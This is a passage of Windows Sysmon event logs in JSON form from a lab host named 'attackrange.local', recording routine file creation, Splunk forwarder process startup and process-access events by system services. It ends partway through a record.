{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7663,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:50.168\r\nProcessGuid: {A837DB8D-04D5-5F25-0000-0010B5451100}\r\nProcessId: 3912\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f48-0\\System.ServiceModel.Discovery.dll\r\nCreationUtcTime: 2020-08-01 05:59:50.168","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:50.168","ProcessGuid":"{A837DB8D-04D5-5F25-0000-0010B5451100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f48-0\\System.ServiceModel.Discovery.dll","CreationUtcTime":"2020-08-01 05:59:50.168","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7664,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.216\r\nProcessGuid: {A837DB8D-04D6-5F25-0000-00106E4C1100}\r\nProcessId: 4784\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.216","ProcessGuid":"{A837DB8D-04D6-5F25-0000-00106E4C1100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7665,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-00106E4C1100}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-00106E4C1100}","TargetProcessId":"4784","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7666,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D6-5F25-0000-00106E4C1100}\r\nTargetProcessId: 4784\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D6-5F25-0000-00106E4C1100}","TargetProcessId":"4784","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7667,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7668,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7669,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7670,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7671,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dl